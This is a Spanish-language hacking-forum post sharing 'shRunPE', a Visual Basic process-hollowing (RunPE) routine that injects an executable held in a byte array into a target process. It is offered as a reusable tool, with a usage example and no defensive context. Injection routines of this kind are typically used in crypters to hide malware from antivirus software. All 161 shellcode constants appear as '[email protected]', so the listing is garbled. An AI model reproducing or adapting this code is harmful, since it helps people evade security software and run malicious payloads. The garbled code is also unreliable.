Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

shRunpe By hamavb

  • 0 Respuestas
  • 4052 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Expermicid

  • *
  • Underc0der
  • Mensajes: 457
  • Actividad:
    0%
  • Reputación 0
  • _-Expermicid-_
    • Ver Perfil
  • Skype: expermicid.xd
« en: Junio 17, 2012, 03:37:16 pm »
Código: Visual Basic
  1. 'Author : hamavb
  2. 'First cut : 02/03/2012 16:50
  3. 'Credits : karcrack & cobein
  4. Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  5. Public Function ShRunPE(ByVal TargetHost As String, bBuffer() As Byte)
  6.         Dim Asm(160) As Currency
  7.         Asm(0) = [email protected]
  8.         Asm(1) = [email protected]
  9.         Asm(2) = [email protected]
  10.         Asm(3) = [email protected]
  11.         Asm(4) = [email protected]
  12.         Asm(5) = [email protected]
  13.         Asm(6) = [email protected]
  14.         Asm(7) = [email protected]
  15.         Asm(8) = [email protected]
  16.         Asm(9) = [email protected]
  17.         Asm(10) = [email protected]
  18.         Asm(11) = [email protected]
  19.         Asm(12) = [email protected]
  20.         Asm(13) = [email protected]
  21.         Asm(14) = [email protected]
  22.         Asm(15) = [email protected]
  23.         Asm(16) = [email protected]
  24.         Asm(17) = [email protected]
  25.         Asm(18) = [email protected]
  26.         Asm(19) = [email protected]
  27.         Asm(20) = [email protected]
  28.         Asm(21) = [email protected]
  29.         Asm(22) = [email protected]
  30.         Asm(23) = [email protected]
  31.         Asm(24) = [email protected]
  32.         Asm(25) = [email protected]
  33.         Asm(26) = [email protected]
  34.         Asm(27) = [email protected]
  35.         Asm(28) = [email protected]
  36.         Asm(29) = [email protected]
  37.         Asm(30) = [email protected]
  38.         Asm(31) = [email protected]
  39.         Asm(32) = [email protected]
  40.         Asm(33) = [email protected]
  41.         Asm(34) = [email protected]
  42.         Asm(35) = [email protected]
  43.         Asm(36) = [email protected]
  44.         Asm(37) = [email protected]
  45.         Asm(38) = [email protected]
  46.         Asm(39) = [email protected]
  47.         Asm(40) = [email protected]
  48.         Asm(41) = [email protected]
  49.         Asm(42) = [email protected]
  50.         Asm(43) = [email protected]
  51.         Asm(44) = [email protected]
  52.         Asm(45) = [email protected]
  53.         Asm(46) = [email protected]
  54.         Asm(47) = [email protected]
  55.         Asm(48) = [email protected]
  56.         Asm(49) = [email protected]
  57.         Asm(50) = [email protected]
  58.         Asm(51) = [email protected]
  59.         Asm(52) = [email protected]
  60.         Asm(53) = [email protected]
  61.         Asm(54) = [email protected]
  62.         Asm(55) = [email protected]
  63.         Asm(56) = [email protected]
  64.         Asm(57) = [email protected]
  65.         Asm(58) = [email protected]
  66.         Asm(59) = [email protected]
  67.         Asm(60) = [email protected]
  68.         Asm(61) = [email protected]
  69.         Asm(62) = [email protected]
  70.         Asm(63) = [email protected]
  71.         Asm(64) = [email protected]
  72.         Asm(65) = [email protected]
  73.         Asm(66) = [email protected]
  74.         Asm(67) = [email protected]
  75.         Asm(68) = [email protected]
  76.         Asm(69) = [email protected]
  77.         Asm(70) = [email protected]
  78.         Asm(71) = [email protected]
  79.         Asm(72) = [email protected]
  80.         Asm(73) = [email protected]
  81.         Asm(74) = [email protected]
  82.         Asm(75) = [email protected]
  83.         Asm(76) = [email protected]
  84.         Asm(77) = [email protected]
  85.         Asm(78) = [email protected]
  86.         Asm(79) = [email protected]
  87.         Asm(80) = [email protected]
  88.         Asm(81) = [email protected]
  89.         Asm(82) = [email protected]
  90.         Asm(83) = [email protected]
  91.         Asm(84) = [email protected]
  92.         Asm(85) = [email protected]
  93.         Asm(86) = [email protected]
  94.         Asm(87) = [email protected]
  95.         Asm(88) = [email protected]
  96.         Asm(89) = [email protected]
  97.         Asm(90) = [email protected]
  98.         Asm(91) = [email protected]
  99.         Asm(92) = [email protected]
  100.         Asm(93) = [email protected]
  101.         Asm(94) = [email protected]
  102.         Asm(95) = [email protected]
  103.         Asm(96) = [email protected]
  104.         Asm(97) = [email protected]
  105.         Asm(98) = [email protected]
  106.         Asm(99) = [email protected]
  107.         Asm(100) = [email protected]
  108.         Asm(101) = [email protected]
  109.         Asm(102) = [email protected]
  110.         Asm(103) = [email protected]
  111.         Asm(104) = [email protected]
  112.         Asm(105) = [email protected]
  113.         Asm(106) = [email protected]
  114.         Asm(107) = [email protected]
  115.         Asm(108) = 49513424[email protected]
  116.         Asm(109) = [email protected]
  117.         Asm(110) = [email protected]
  118.         Asm(111) = [email protected]
  119.         Asm(112) = [email protected]
  120.         Asm(113) = [email protected]
  121.         Asm(114) = [email protected]
  122.         Asm(115) = [email protected]
  123.         Asm(116) = [email protected]
  124.         Asm(117) = [email protected]
  125.         Asm(118) = [email protected]
  126.         Asm(119) = [email protected]
  127.         Asm(120) = [email protected]
  128.         Asm(121) = [email protected]
  129.         Asm(122) = [email protected]
  130.         Asm(123) = [email protected]
  131.         Asm(124) = [email protected]
  132.         Asm(125) = [email protected]
  133.         Asm(126) = [email protected]
  134.         Asm(127) = [email protected]
  135.         Asm(128) = [email protected]
  136.         Asm(129) = [email protected]
  137.         Asm(130) = [email protected]
  138.         Asm(131) = [email protected]
  139.         Asm(132) = [email protected]
  140.         Asm(133) = [email protected]
  141.         Asm(134) = [email protected]
  142.         Asm(135) = [email protected]
  143.         Asm(136) = [email protected]
  144.         Asm(137) = [email protected]
  145.         Asm(138) = [email protected]
  146.         Asm(139) = [email protected]
  147.         Asm(140) = [email protected]
  148.         Asm(141) = [email protected]
  149.         Asm(142) = [email protected]
  150.         Asm(143) = [email protected]
  151.         Asm(144) = [email protected]
  152.         Asm(145) = [email protected]
  153.         Asm(146) = [email protected]
  154.         Asm(147) = [email protected]
  155.         Asm(148) = [email protected]
  156.         Asm(149) = [email protected]
  157.         Asm(150) = [email protected]
  158.         Asm(151) = [email protected]
  159.         Asm(152) = [email protected]
  160.         Asm(153) = [email protected]
  161.         Asm(154) = [email protected]
  162.         Asm(155) = [email protected]
  163.         Asm(156) = [email protected]
  164.         Asm(157) = [email protected]
  165.         Asm(158) = [email protected]
  166.         Asm(159) = [email protected]
  167.         Asm(160) = [email protected]
  168.         CallWindowProc VarPtr(Asm(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0
  169. End Function

Ejemplo de uso:

Código: Visual Basic
  1. ShRunPE "Target Exe Path", "PE data as byte()"

fuente: imsecure
« Última modificación: Mayo 12, 2014, 03:34:49 pm por Expermicid »

 

¿Te gustó el post? COMPARTILO!



mshRunPE_Strings <-- a mod of shRunPE

Iniciado por Expermicid

Respuestas: 0
Vistas: 4105
Último mensaje Junio 17, 2012, 03:34:21 pm
por Expermicid